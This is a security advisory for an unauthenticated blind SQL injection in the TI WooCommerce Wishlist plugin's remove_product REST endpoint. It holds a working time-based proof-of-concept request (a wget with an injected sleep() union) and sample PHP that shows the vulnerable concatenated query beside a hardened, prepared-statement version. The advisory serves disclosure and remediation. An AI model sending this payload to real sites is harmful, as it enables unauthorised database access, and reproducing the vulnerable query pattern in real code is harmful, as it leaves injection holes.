TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection
The plugin does not sanitise or escape the item_id parameter before using it in a SQL statement in the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks.
Proof of Concept
time wget 'https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(2)%20--%20g'
Even though the request returns an HTTP 400 error, the payload is still processed and the response is delayed by the injected sleep().
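As an added illustration (not the plugin's own code), the following shows the class of defect described above: a WordPress REST callback that concatenates the request's item_id straight into a DELETE statement, beside a hardened handler that validates the value and binds it with $wpdb->prepare(). The route, table name and function names are hypothetical.

```php
<?php
// Added example, not code from the affected plugin. Route, table and
// function names are assumptions used only to illustrate the pattern.

// Vulnerable pattern: the raw request string reaches SQL unquoted and
// unvalidated, so anything appended to a numeric prefix is executed.
function example_remove_product_vulnerable( WP_REST_Request $request ) {
    global $wpdb;
    $item_id = $request->get_param( 'item_id' ); // attacker-controlled
    $table   = $wpdb->prefix . 'example_wishlist_items';
    // BAD: string concatenation instead of a prepared statement.
    return $wpdb->query( "DELETE FROM {$table} WHERE ID = " . $item_id );
}

// Hardened version: reject non-integers up front, then bind the value
// with %d so the database only ever sees an integer literal.
function example_remove_product_safe( WP_REST_Request $request ) {
    global $wpdb;
    $item_id = $request->get_param( 'item_id' );
    if ( ! is_numeric( $item_id ) || (int) $item_id <= 0 ) {
        return new WP_Error(
            'invalid_item_id',
            'item_id must be a positive integer',
            array( 'status' => 400 )
        );
    }
    $item_id = absint( $item_id );
    $table   = $wpdb->prefix . 'example_wishlist_items';
    $removed = $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table} WHERE ID = %d", $item_id )
    );
    return rest_ensure_response( array( 'removed' => (int) $removed ) );
}

// Registering the route with argument validation stops malformed values
// before the callback runs; the endpoint stays public here because the
// fix for this bug is input handling, not authentication.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/wishlist/remove_product/(?P<key>[A-Za-z0-9]+)', array(
        'methods'             => 'GET',
        'callback'            => 'example_remove_product_safe',
        'permission_callback' => '__return_true',
        'args'                => array(
            'item_id' => array(
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );
```

With the hardened handler, a non-numeric item_id is refused with a 400 before any query is built, so the timing difference used in the proof of concept no longer appears.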